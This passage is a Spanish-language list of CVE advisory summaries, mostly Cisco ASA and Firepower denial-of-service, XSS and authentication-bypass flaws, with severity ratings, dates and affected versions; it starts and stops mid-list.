    Dispositivos de las series Cisco Adaptive Security Appliances (ASA ) 5500, y el módulo de ASA en dispositivos de la serie Cisco Catalyst 6500, con el software v7.2 anterior a v7.2(5.3), v8.0 antereior a v8.0(5.25), v8.1 anterior a v8.1(2.50), v8.2 anterior a v8.2(5.11), v8.3 anterior a v8.3(2.23), v8.4 anterior a v8.4(2), y v8.5 anterior a v8.5(1.1) permite a atacantes remotos causar una denegación de servicio (reinicio del dispositivo) a través del tráfico MSN Instant Messenger manipulado, también conocido como Bug ID CSCtl67486.
  • CVE-2011-3298
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) 5500 series, y el módulo ASA Services de los dispositivos Cisco Catalyst 6500 series, con software 7.0 anterior a 7.0(8.13), 7.1 y 7.2 anterior a 7.2(5.3), 8.0 anterior a 8.0(5.24), 8.1 anterior a 8.1(2.50), 8.2 anterior a 8.2(5), 8.3 anterior a 8.3(2.18), 8.4 anterior a 8.4(1.10), y 8.5 anterior a 8.5(1.1) y Cisco Firewall Services Module (aka FWSM) 3.1 anterior a 3.1(21), 3.2 anterior a 3.2(22), 4.0 anterior a 4.0(16), y 4.1 anterior a 4.1(7) permiten a atacantes remotos evitar la autenticación a través de respuestas TACACS+ modificadas. También conocido como Bug IDs CSCto40365 y CSCto74274.
  • CVE-2011-3299
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) 5500 series, y el módulo ASA Services de Cisco Catalyst 6500 series, con software 7.0 anteriores a 7.0(8.13), 7.1 y 7.2 anteriores a 7.2(5.4), 8.0 anteriores a 8.0(5.25), 8.1 y 8.2 anteriores a 8.2(5.11), 8.3 anteriores a 8.3(2.23), 8.4 anteriores a 8.4(2.6), y 8.5 anteriores a 8.5(1.1) y Cisco Firewall Services Module (aka FWSM) 3.1 anteriores a 3.1(21), 3.2 anteriores a 3.2(22), 4.0 anteriores a 4.0(16), y 4.1 anteriores a 4.1(7) permiten a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de tráfico SunRPC modificado. También conocido como Bug IDs CSCto92380 and CSCtq09972.
  • CVE-2011-3300
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) 5500 series, y el módulo ASA Services de Cisco Catalyst 6500 series, con software 7.0 anteriores a 7.0(8.13), 7.1 y 7.2 anteriores a 7.2(5.4), 8.0 anteriores a 8.0(5.25), 8.1 y 8.2 anteriores a 8.2(5.11), 8.3 anteriores a 8.3(2.23), 8.4 anteriores a 8.4(2.6), y 8.5 anteriores a 8.5(1.1) y Cisco Firewall Services Module (aka FWSM) 3.1 anteriores a 3.1(21), 3.2 anteriores a 3.2(22), 4.0 anteriores a 4.0(16), y 4.1 anteriores a 4.1(7) permiten a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de tráfico SunRPC modificado. También conocido como Bug IDs CSCtq06065 and CSCtq09978.
  • CVE-2011-3301
    Severidad: ALTA
    Fecha de publicación: 06/10/2011
    Fecha de última actualización: 15/08/2023
    Dispositivos Cisco Adaptive Security Appliances (ASA) 5500 series, y el módulo ASA Services de Cisco Catalyst 6500 series, con software 7.0 anteriores a 7.0(8.13), 7.1 y 7.2 anteriores a 7.2(5.4), 8.0 anteriores a 8.0(5.25), 8.1 y 8.2 anteriores a 8.2(5.11), 8.3 anteriores a 8.3(2.23), 8.4 anteriores a 8.4(2.6), y 8.5 anteriores a 8.5(1.1) y Cisco Firewall Services Module (aka FWSM) 3.1 anteriores a 3.1(21), 3.2 anteriores a 3.2(22), 4.0 anteriores a 4.0(16), y 4.1 anteriores a 4.1(7) permiten a atacantes remotos provocar una denegación de servicio (recarga del dispositivo) a través de tráfico SunRPC modificado. También conocido como Bug IDs CSCtq06062 y CSCtq09986.
  • CVE-2012-4661
    Severidad: ALTA
    Fecha de publicación: 29/10/2012
    Fecha de última actualización: 15/08/2023
    El motor de inspección DCERPC en los dispositivos Cisco Adaptive Security Appliances (ASA) 5500, y el Módulo de Servicios de ASA (ASASM) en los dispositivos Cisco Catalyst 6500, con la versión del software anterior a la v8.3(2.25), v8.4 antes de v8.4 (2,5) y v8.5 antes de v8.5(1.13) y v8.6 antes de v8.6(1.3) y el módulo Firewall Services Module (FWSM) v4.1 antes de v4.1(7) en los switches Cisco Catalyst 6500 y los routers de la serie 7600, permite a atacantes remotos provocar una denegación de servicio (reinicio del dispositivo) a través de un paquete DCERPC modificado, también conocido como bug CSCtr21359 y CSCtr27522.
  • CVE-2012-4662
    Severidad: ALTA
    Fecha de publicación: 29/10/2012
    Fecha de última actualización: 15/08/2023
    El motor de inspección DCERPC en los dispositivos Cisco Adaptive Security Appliances (ASA) 5500, y el Módulo de Servicios de ASA (ASASM) en los dispositivos Cisco Catalyst 6500, con la versión del software anterior a la v8.3(2.25), v8.4 antes de v8.4 (2,5) y v8.5 antes de v8.5(1.13) y el Firewall Services Module (FWSM) v4.1 antes de v4.1(7) en los switches Cisco Catalyst 6500 y los routers de la serie 7600, permite a atacantes remotos provocar una denegación de servicio (reinicio del dispositivo) a través de un paquete DCERPC modificado, también conocido como bug CSCtr21376 y CSCtr27524.
  • CVE-2012-4663
    Severidad: ALTA
    Fecha de publicación: 29/10/2012
    Fecha de última actualización: 15/08/2023
    El motor de inspección DCERPC en los dispositivos Cisco Adaptive Security Appliances (ASA) 5500, y el Módulo de Servicios de ASA (ASASM) en los dispositivos Cisco Catalyst 6500, con la versión del software anterior a la v8.3(2.25), v8.4 antes de v8.4 (2,5) y v8.5 antes de v8.5(1.13) y el Firewall Services Module (FWSM) v4.1 antes de v4.1(7) en los switches Cisco Catalyst 6500 y los routers de la serie 7600, permite a atacantes remotos provocar una denegación de servicio (reinicio del dispositivo) a través de un paquete DCERPC modificado, también conocido como bug CSCtr21346 y CSCtr27521.
  • CVE-2014-8270
    Severidad: MEDIA
    Fecha de publicación: 12/12/2014
    Fecha de última actualización: 02/08/2023
    BMC Track-It! 11.3 permite a atacantes remotos ganar privilegios y ejecutar código arbitrario mediante la ceración de una cuenta cuya nombre coincide con él de una cuenta de sistema local, posteriormente realizando una recalibración de la contraseña.
  • CVE-2015-6360
    Severidad: ALTA
    Fecha de publicación: 21/04/2016
    Fecha de última actualización: 15/08/2023
    La característica de procesado de cifrado en Cisco libSRTP en versiones anteriores a 1.5.3 permite a atacantes remotos provocar una denegación de servicio a través de campos manipulados en paquetes SRTP, también conocida como Bug ID CSCux00686.
  • CVE-2016-5118
    Severidad: ALTA
    Fecha de publicación: 10/06/2016
    Fecha de última actualización: 01/08/2023
    La función OpenBlob en blob.c en GraphicsMagick en versiones anteriores a 1.3.24 y ImageMagick permite a atacantes remotos ejecutar código arbitrario a través del caractér | (tubería) en el inicio del nombre de archivo.
  • CVE-2015-5738
    Severidad: MEDIA
    Fecha de publicación: 26/07/2016
    Fecha de última actualización: 16/08/2023
    La implementación de RSA-CRT en Cavium Software Development Kit (SDK) 2.x cuando es utilizada en Hardware OCTEON II CN6xxx en Linux para soporte TLS con Perfect Forward Secrecy (PFS), facilita a atacantes remotos obtener claves RSA privadas llevando a cabo un ataque de canal lateral Lenstra.
  • CVE-2014-0739
    Severidad: MEDIA
    Fecha de publicación: 22/02/2014
    Fecha de última actualización: 15/08/2023
    Condición de carrera en el componente Phone Proxy en Cisco Adaptive Security Appliance (ASA) Software 9.1(.3) y versiones anteriores permite a atacantes remotos eludir la autenticación sec_db y proporcionar ciertos servicios pass-through a dispositivos no confiables a través de una petición TFTP de configuración de archivo manipulada, vulnerabilidad también conocida como Bug ID CSCuj66766
  • CVE-2016-6424
    Severidad: MEDIA
    Fecha de publicación: 06/10/2016
    Fecha de última actualización: 15/08/2023
    La implementación de DHCP Relay en Cisco Adaptive Security Appliance (ASA) Software 8.4.7.29 y 9.1.7.4 permite a atacantes remotos provocar una denegación de servicio (cuña de interfaz) a través un índice de transmisión de paquetes DHCP manipulado, vulnerabilidad también conocida como Bug ID CSCuy66942.
  • CVE-2017-6765
    Severidad: MEDIA
    Fecha de publicación: 07/08/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la interfaz de gestión web de Cisco Adaptive Security Appliance (ASA) 9.1(6,11) y 9.4(1.2) podría permitir que un atacante remoto sin autenticar lleve a cabo un ataque de Cross-Site Scripting (XSS) contra un usuario de dicha interfaz en un dispositivo afectado, también conocido como WebVPN XSS. La vulnerabilidad se debe a la validación insuficiente de entradas de un usuario por parte de la interfaz de gestión web de un dispositivo afectado. Un atacante podría explotar esta vulnerabilidad haciendo que un usuario de la interfaz haga clic en un enlace manipulado. Si se explota esta vulnerabilidad con éxito, el atacante podría ejecutar código script arbitrario en el contexto de la interfaz o acceder a información confidencial del navegador. Cisco Bug IDs: CSCve19179.
  • CVE-2016-6431
    Severidad: ALTA
    Fecha de publicación: 27/10/2016
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad local Certificate Authority (CA) de Cisco ASA Software en versiones anteriores a 9.6(1.5) podría permitir a un atacante remoto no autenticado provocar un reinicio del sistema afectado. La vulnerabilidad se debe a un manejo inadecuado de paquetes manipulados durante la operación de inscripción. Un atacante podría explotar esta vulnerabilidad enviando una petición de inscripción manipulada al sistema afectado. Una explotación podría permitir al atacante provocar el reinicio del sistema afectado. Nota: Solo paquetes HTTPS dirigidos a la interfaz de Cisco ASA, donde la CA local está permitiendo la inscripción de usuarios, puede ser usada para desencadenar esta vulnerabilidad. Este vulnerabilidad afecta a sistemas configurados en modo de firewall enrutado y en modo de contexto único o múltiple.
  • CVE-2016-6432
    Severidad: ALTA
    Fecha de publicación: 27/10/2016
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad Identity Firewall de Cisco ASA Software en versiones anteriores a 9.6(2.1) podría permitir a un atacante remoto no autenticado provocar un reinicio del sistema afectado o ejecutar un código remotamente. La vulnerabilidad se debe a un desbordamiento de búfer en el área código afectada. Un atacante podría explotar esta vulnerabilidad enviando un paquete NetBIOS manipulado en respuesta a una prueba NetBIOS enviada por el software ASA. Una explotación podría permitir al atacante ejecutar un código arbitrario y obtener acceso total del sistema o provocar un reinicio del sistema afectado. Nota: Solo el tráfico dirigido al sistema afectado puede ser usado para explotar esta vulnerabilidad. Esta vulnerabilidad afecta sistemas configurados en modo firewall enrutado y en modo de contexto único o múltiple. Esta vulnerabilidad puede ser desencadenada por tráfico IPv4.
  • CVE-2017-12246
    Severidad: ALTA
    Fecha de publicación: 05/10/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la implementación de la característica de autenticación directa en Cisco Adaptive Security Appliance (ASA) Software podría permitir que un atacante remoto no autenticado provoque un reinicioinesperado de un dispositivo afectado, lo que resultaría en una denegación de servicio (DoS). Esta vulnerabilidad se debe a la incompleta validación de entrada de la cabecera HTTP. Un atacante podría explotar la vulnerabilidad mediante el envío de de una petición HTTP manipulada a la dirección IP local de un dispositivo afectado. Con el exploit correcto, el atacante podría provocar el reinicio del dispositivo afectado. Esta vulnerabilidad afecta a las versiones de Cisco Adaptive Security Appliance (ASA) Software que se ejecutan en los siguientes productos de Cisco: ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module para Cisco Catalyst 6500 Series Switches y Cisco 7600 Series Routers, ASA 1000V Cloud Firewall, Adaptive Security Virtual Appliance (ASAv), Firepower 4110 Security Appliance, Firepower 9300 ASA Security Module, ISA 3000 Industrial Security Appliance. Cisco Bug IDs: CSCvd59063.
  • CVE-2016-6461
    Severidad: MEDIA
    Fecha de publicación: 19/11/2016
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la interfaz de gestión basada en web HTTP de el Cisco Adaptive Security Appliance (ASA) podría permitir a un atacante remoto no autenticado, inyectar comandos XML arbitrarios en el sistema afectado. Más información: CSCva38556. Lanzamientos conocidos afectados: 9.1(6.10). Lanzamientos conocidos solucionados 100.11(0.75) 100.15(0.137) 100.8(40.129) 96.2(0.95) 97.1(0.55) 97.1(12.7) 97.1(6.30).
  • CVE-2017-6752
    Severidad: MEDIA
    Fecha de publicación: 07/08/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la interfaz web de Cisco Adaptive Security Appliance (ASA) 9.3(3) y 9.6(2) podría permitir que un atacante remoto sin autenticar determine nombres de usuario válidos. El atacante podría utilizar esta información para llevar a cabo ataques de reconocimiento adicionales. La vulnerabilidad se produce debido a la interacción entre Lightweight Directory Access Protocol (LDAP) y SSL Connection Profile cuando se configuran conjuntamente. Un atacante podría explotar la vulnerabilidad mediante la ejecución de un ataque de enumeración de nombres de usuario contra la dirección IP del dispositivo. Un exploit podría permitir que el atacante determine nombres de usuario válidos. Cisco Bug IDs: CSCvd47888.
  • CVE-2017-6770
    Severidad: MEDIA
    Fecha de publicación: 07/08/2017
    Fecha de última actualización: 15/08/2023
    Cisco IOS 12.0 en versiones hasta 15.6, Adaptive Security Appliance (ASA) Software 7.0.1 en versiones hasta 9.7.1.2, NX-OS 4.0 en versiones hasta 12.0, e IOS XE 3.6 en versiones hasta 3.18 se han visto afectadas por una vulnerabilidad relacionada con la base de datos Link State Advertisement (LSA) del protocolo de enrutamiento Open Shortest Path First (OSPF). Esta vulnerabilidad podría permitir que un atacante remoto sin autenticar asuma el control total de la tabla de enrutamiento de dominios OSPF Autonomous System (AS). Así, el atacante podría interceptar el tráfico y crear agujeros negros. El atacante podría explotar esta vulnerabilidad mediante la inyección de paquetes OSPF manipulados. La explotación exitosa de esta vulnerabilidad podría hacer que el router objetivo vacíe su tabla de enrutamiento y propague la actualización OSPF LSA type 1 manipulada, mediante el dominio OSPF AS. Para explotar esta vulnerabilidad, un atacante debe determinar con precisión ciertos parámetros en la base de datos LSA del router objetivo. Esta vulnerabilidad solo puede aprovecharse mediante el envío de paquetes OSPF LSA type 1 de unidifusión (unicast) o multidifusión (multicast) manipulados. Ningún otro tipo de paquete LSA presenta esta vulnerabilidad. OSPFv3 no se ha visto afectado por esta vulnerabilidad. El protocolo Fabric Shortest Path First (FSPF) no se ha visto afectado por esta vulnerabilidad. Cisco Bug IDs: CSCva74756, CSCve47393, CSCve47401.
  • CVE-2018-0101
    Severidad: ALTA
    Fecha de publicación: 29/01/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad VPN Secure Sockets Layer (SSL) de Cisco Adaptive Security Appliance (ASA) podría permitir que un atacante remoto no autenticado provoque la recarga del sistema afectado o que ejecute código de forma remota. La vulnerabilidad se debe a un intento de doble liberación (double free) de una región de memoria cuando la característica webvpn está habilitada en el dispositivo Cisco ASA. Un atacante podría explotar esta vulnerabilidad enviando múltiples peticiones XML manipuladas a la interfaz configurada por webvpn en el sistema afectado. Un exploit podría permitir que el atacante ejecute código arbitrario y obtenga control total del sistema, o que provoque una recarga del dispositivo afectado. Esta vulnerabilidad afecta a las versiones de Cisco ASA Software que se ejecutan en los siguientes productos de Cisco: 3000 Series Industrial Security Appliance (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, ASA 1000V Cloud Firewall, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4110 Security Appliance, Firepower 9300 ASA Security Module y Firepower Threat Defense Software (FTD). Cisco Bug IDs: CSCvg35618.
  • CVE-2018-0228
    Severidad: ALTA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad de creación de flujo de entrada de Cisco Adaptive Security Appliance (ASA) podría permitir que un atacante remoto no autenticado provoque que la CPU aumente su uso por encima del 100%, provocando una condición de denegación de servicio (DoS) en un sistema afectado. La vulnerabilidad se debe a la manipulación incorrecta de un bloqueo de software interno que podría evitar que otros procesos del sistema obtengan ciclos de CPU, provocando una condición de CPU alta. Un atacante podría explotar esta vulnerabilidad enviando un flujo constante de paquetes de IP maliciosos que podrían provocar que se creen conexiones en el dispositivo objetivo. Si se explota esta vulnerabilidad con éxito, el atacante podría agota los recursos de la CPU, lo que resultaría en una condición de denegación de servicio (DoS) durante la cual el tráfico del dispositivo podría retrasarse. Esta vulnerabilidad aplica al tráfico de entrada IPv4 o IPv6. Esta vulnerabilidad afecta a las versiones de Cisco Adaptive Security Appliance (ASA) y Firepower Threat Defense (FTD) Software que se ejecutan en los siguientes productos de Cisco: 3000 Series Industrial Security Appliances (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliances (ASAv), Firepower 2100 Series Security Appliances, Firepower 4110 Security Appliances y Firepower 9300 ASA Security Modules. Cisco Bug IDs: CSCvf63718.
  • CVE-2018-0229
    Severidad: MEDIA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la implementación de la autenticación Security Assertion Markup Language (SAML) Single Sign-On (SSO) para Cisco AnyConnect Secure Mobility Client for Desktop Platforms, Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podría permitir que un atacante remoto no autenticado establezca una sesión AnyConnect autenticada a través de un dispositivo afectado que ejecute el software ASA o FTD. La autenticación tendría que ser realizada por un tercero, lo que también se conoce como fijación de sesión. La vulnerabilidad existe debido a que no hay un mecanismo para que el software ASA o FTD detecte que la petición de autenticación se origina directamente en el cliente AnyConnect. Un atacante podría explotar esta vulnerabilidad convenciendo a un usuario para que haga clic en un enlace manipulado y se autentique empleando el Proveedor de Identidad (IdP) de la compañía. Su explotación con éxito podría permitir que el atacante secuestre un token de autenticación válido y lo emplee para establecer una sesión AnyConnect autenticada mediante un dispositivo afectado que ejecute software ASA o FTD. Esta vulnerabilidad afecta a Cisco AnyConnect Secure Mobility Client y a ASA Software y FTD Software cuando están configurados para SSO basado en SAML 2.0 para la VPN AnyConnect Remote Access que se está ejecutando e los siguientes productos de Cisco: 3000 Series Industrial Security Appliances (ISA), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module y FTD Virtual (FTDv). Cisco Bug IDs: CSCvg65072, CSCvh87448.
  • CVE-2018-0230
    Severidad: ALTA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad interna de procesamiento de paquetes de Cisco Firepower Threat Defense (FTD) Software para Cisco Firepower 2100 Series Security Appliances podrá permitir que un atacante remoto no autenticado provoque que un dispositivo afectado deje de procesar tráfico. Esto resulta en una denegación de servicio (DoS). La vulnerabilidad se debe a que el software afectado no valida correctamente los paquetes IPv4 (IP Version 4) e IPv6 (IP Version 6) una vez el software haya reensamblado los paquetes (tras una fragmentación de IP). Un atacante podría explotar esta vulnerabilidad enviando una serie de paquetes IPv4 o IPv6 maliciosos fragmentados a un dispositivo afectado. Su explotación con éxito podría permitir que el atacante haga que los procesos Snort en el dispositivo afectado se bloqueen en un nivel de uso de la CPU del 100%. Esto provocaría que el dispositivo deje de procesar tráfico y resulte en una condición de denegación de servicio (DoS) hasta que el dispositivo se recargue manualmente. Esta vulnerabilidad afecta a Cisco Firepower Threat Defense (FTD) Software Releases 6.2.1 y 6.2.2, si el software se ejecuta en Cisco Firepower 2100 Series Security Appliance. Cisco Bug IDs: CSCvf91098.
  • CVE-2018-0231
    Severidad: ALTA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la biblioteca Transport Layer Security (TLS) de Cisco Adaptive Security Appliance (ASA) Software y Cisco Firepower Threat Defense (FTD) Software podría permitir que un atacante remoto no autenticado desencadene una recarga del dispositivo afectado, lo que resulta en una denegación de servicio (DoS). Esta vulnerabilidad se debe a una validación insuficiente de las entradas realizadas por el usuario. Un atacante podría explotar esta vulnerabilidad enviando un mensaje TLS malicioso a una interfaz habilitada para los servicios SSL (Secure Sockets Layer) en un dispositivo afectado. Los mensajes que empleen la versión 3 (SSLv3) o la versión 2 (SSLv2) de SSL no pueden emplearse para explotar esta vulnerabilidad. Su explotación podría permitir que el atacante provoque un subdesbordamiento de búfer, desencadenando un cierre inesperado en el dispositivo afectado. Esta vulnerabilidad afecta a las versiones de Cisco ASA Software y Cisco FTD Software que se ejecutan en los siguientes productos de Cisco: Adaptive Security Virtual Appliance (ASAv), Firepower Threat Defense Virtual (FTDv) y Firepower 2100 Series Security Appliance. Cisco Bug IDs: CSCve18902, CSCve34335, CSCve38446.
  • CVE-2018-0242
    Severidad: MEDIA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la interfaz de gestión web WebVPN de Cisco Adaptive Security Appliance podría permitir que un atacante remoto no autenticado lleve a cabo un ataque de Cross-Site Scripting (XSS) contra un usuario de dicha interfaz en un dispositivo afectado. La vulnerabilidad se debe a la validación insuficiente de entrada de datos de parte del usuario en la interfaz de gestión web de un dispositivo afectado. Un atacante podría explotar esta vulnerabilidad haciendo que un usuario de la interfaz haga clic en un enlace manipulado. Su explotación con éxito podría permitir al atacante ejecutar código script arbitrario en el contexto de la interfaz o que pueda acceder a información sensible del navegador. Cisco Bug IDs: CSCvg33985.
  • CVE-2018-0251
    Severidad: MEDIA
    Fecha de publicación: 19/04/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la pantalla Web Server Authentication Required del portal Clientless Secure Sockets Layer (SSL) VPN de Cisco Adaptive Security Appliance (ASA) Software podría permitir que un atacante remoto no autenticado lleve a cabo un ataque de Cross-Site Scripting (XSS) contra un usuario de ese portal en un dispositivo afectado. La vulnerabilidad se debe a la validación insuficiente de entrada de datos de parte del usuario en la interfaz web de un dispositivo afectado. Un atacante podría explotar esta vulnerabilidad haciendo que un usuario de la interfaz haga clic en un enlace manipulado. Su explotación con éxito podría permitir al atacante ejecutar código script arbitrario en el contexto del portal o que pueda acceder a información sensible del navegador. Esta vulnerabilidad afecta a los siguientes productos de Cisco que ejecutan una versión vulnerable de Cisco ASA Software: 3000 Series Industrial Security Appliances, Adaptive Security Virtual Appliance (ASAv), ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches y ASA Services Module for Cisco 7600 Series Routers. Cisco Bug IDs: CSCvh20742.
  • CVE-2018-0296
    Severidad: MEDIA
    Fecha de publicación: 07/06/2018
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la interfaz web de Cisco Adaptive Security Appliance (ASA) podría permitir que un atacante remoto sin autenticar haga que el dispositivo afectado se reinicie inesperadamente y provoque una denegación de servicio (DoS) como consecuencia. También es posible en ciertas versiones del software que ASA no se recargue, pero un atacante podría ver información sensible del sistema sin autenticación mediante el uso de técnicas de salto de directorio. Esta vulnerabilidad se debe a la falta de validación de entradas adecuada de la URL HTTP. Un atacante podría explotar esta vulnerabilidad enviando una petición HTTP manipulada a un dispositivo afectado. Su explotación podría permitir a un atacante provocar una denegación de servicio o la divulgación no autenticada de información. Esta vulnerabilidad aplica al tráfico HTTP IPv4 y IPv6. Esta vulnerabilidad afecta a las versiones de Cisco ASA Software y Cisco Firepower Threat Defense (FTD) Software que se ejecutan en los siguientes productos de Cisco: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, Firepower 9300 ASA Security Module y FTD Virtual (FTDv). Cisco Bug IDs: CSCvi16029.
  • CVE-2018-5873
    Severidad: MEDIA
    Fecha de publicación: 06/07/2018
    Fecha de última actualización: 18/07/2023
    Debido a una condición de carrera al acceder a los archivos en todas las distribuciones de Android de CAF (Android for MSM, Firefox OS for MSM y QRD Android) que utilizan el kernel de Linux antes del parche de seguridad de nivel del 05/07/2018, puede ocurrir una condición de uso de memoria previamente liberada en el kernel.
  • CVE-2008-1145
    Severidad: MEDIA
    Fecha de publicación: 04/03/2008
    Fecha de última actualización: 01/08/2023
    Una vulnerabilidad de salto de directorio en WEBrick en Ruby versiones 1.8 anteriores a 1.8.5-p115 y 1.8.6-p114, y versiones 1.9 hasta 1.9.0-1, cuando se ejecuta en sistemas que admiten separadores de ruta de barra invertida (\) o nombres de archivo sin distinción entre mayúsculas y minúsculas, permite a atacantes remotos acceder a archivos arbitrarios por medio de secuencias o (1) "..%5c" (barra invertida codificada) o (2) nombres de archivo que coinciden con los patrones de la opción :NondisclosureName.
  • CVE-2017-3807
    Severidad: ALTA
    Fecha de publicación: 09/02/2017
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en el código de Common Internet Filesystem (CIFS) en la funcionalidad Clientless SSL VPN de Cisco ASA Software, Major Releases 9.0-9.6, podría permitir a un atacante remoto autenticado provocar un desbordamiento de la memoria dinámica. La vulnerabilidad se debe a una validación insuficiente de la entrada suministrada por el usuario. Un atacante podría explotar esta vulnerabilidad enviando una URL manipulada al sistema afectado. Una explotación podría permitir al atacante remoto provocar una recarga del sistema afectado o potencialmente ejecutar código. Nota: Solo tráfico dirigido al sistema afectado puede ser usado para explotar esta vulnerabilidad. Esta vulnerabilidad solo afecta a sistemas configurados en modo firewall enrutado y modo de contexto individual o múltiple. Esta vulnerabilidad puede desencadenarse por tráfico IPv4 o IPv6. Se necesita una conexión TCP válida para llevar a cabo el ataque. El atacante necesita tener credenciales válidas para iniciar sesión en el portal Clientless SSL VPN. El software Cisco ASA vulnerable que se ejecuta en los siguientes productos puede verse afectado por esta vulnerabilidad: Cisco ASA 5500 Series Adaptive Security Appliances, Cisco ASA 5500-X Series Next-Generation Firewalls, Cisco Adaptive Security Virtual Appliance (ASAv), Cisco ASA para Firepower 9300 Series, Cisco ASA para Firepower 4100 Series. Cisco Bug IDs: CSCvc23838.
  • Vulnerabilidad en NPM simple-get (CVE-2022-0355)
    Severidad: MEDIA
    Fecha de publicación: 26/01/2022
    Fecha de última actualización: 02/08/2023
    Una Exposición de Información Confidencial a un Actor no Autorizado en NPM simple-get versiones anteriores a 4.0.1
  • CVE-2019-1687
    Severidad: ALTA
    Fecha de publicación: 03/05/2019
    Fecha de última actualización: 15/08/2023
    Una vulnerabilidad en la funcionalidad de proxy TCP para el software Adaptive Security Appliance (ASA) de Cisco y el software Firepower Threat Defense (FTD) de Cisco, podría permitir que un atacante remoto no identificado cause que el dispositivo se reinicie inesperadamente, dando como resultado una condición de Denegación de Servicio (DoS) . La vulnerabilidad es debido a un error en la inspección de paquetes basados en TCP, lo que podría causar que el paquete TCP tenga un encabezado formateado de capa 2 (L2) no válido. Un atacante podría aprovechar esta vulnerabilidad enviando una secuencia de paquetes TCP creada hacia el dispositivo de destino. Una operación con éxito podría permitir al atacante causar una condición DoS.
  • CVE-2022-36804
    Severidad: Pendiente de análisis
    Fecha de publicación: 25/08/2022
    Fecha de última actualización: 08/08/2023
    Múltiples endpoints de la API en Atlassian Bitbucket Server y Data Center 7.0.0 versiones anteriores a 7.6.17, desde versiones 7.7.0 anteriores a 7.17.10, desde versiones 7.18.0 anteriores a 7.21.4, desde versiones 8.0.0 anteriores a 8.0.3, desde versiones 8.1. 0 versiones anteriores a 8.1.3, y desde versiones 8.2.0 anteriores a 8.2.2, y desde versiones 8.3.0 anteriores a 8.3.1, permite a atacantes remotos con permisos de lectura en un repositorio público o privado de Bitbucket ejecutar código arbitrario enviando una petición HTTP maliciosa. Esta vulnerabilidad fue reportada por medio de nuestro programa Bug Bounty por TheGrandPew.
  • CVE-2022-40684
    Severidad: Pendiente de análisis
    Fecha de publicación: 18/10/2022
    Fecha de última actualización: 08/08/2023
    Una omisión de autenticación usando una ruta o canal alternativo [CWE-288] en Fortinet FortiOS versión versiones 7.2.0 hasta 7.2.1 y 7.0.0 hasta 7.0.6, FortiProxy versión 7.2.0 y versiones 7.0.0 hasta 7.0.6 y FortiSwitchManager versión 7.2.0 y 7.0.0, permite a un atacante no autenticado llevar a cabo operaciones en la interfaz administrativa por medio de peticiones HTTP o HTTPS especialmente diseñadas
  • CVE-2022-26982
    Severidad: MEDIA
    Fecha de publicación: 05/04/2022
    Fecha de última actualización: 08/08/2023
    SimpleMachinesForum versiones 2.1.1 y anteriores, permiten a administradores remotos autenticados ejecutar código arbitrario al insertar un código php vulnerable porque los temas pueden ser modificados por un administrador
  • CVE-2022-37703
    Severidad: Pendiente de análisis
    Fecha de publicación: 13/09/2022
    Fecha de última actualización: 08/08/2023
    En Amanda versión 3.5.1, se encontró una vulnerabilidad de filtrado de información en el binario SUID de calcsize. Un atacante puede abusar de esta vulnerabilidad para saber si un directorio se presenta o no en cualquier parte del fs. El binario usará "opendir()" como root directamente sin comprobar la ruta, permitiendo al atacante proporcionar una ruta arbitraria
  • CVE-2022-24527
    Severidad: MEDIA
    Fecha de publicación: 15/04/2022
    Fecha de última actualización: 08/08/2023
    Una vulnerabilidad de Elevación de Privilegios en Windows Endpoint Configuration Manager
  • CVE-2022-28368
    Severidad: ALTA
    Fecha de publicación: 03/04/2022
    Fecha de última actualización: 08/08/2023
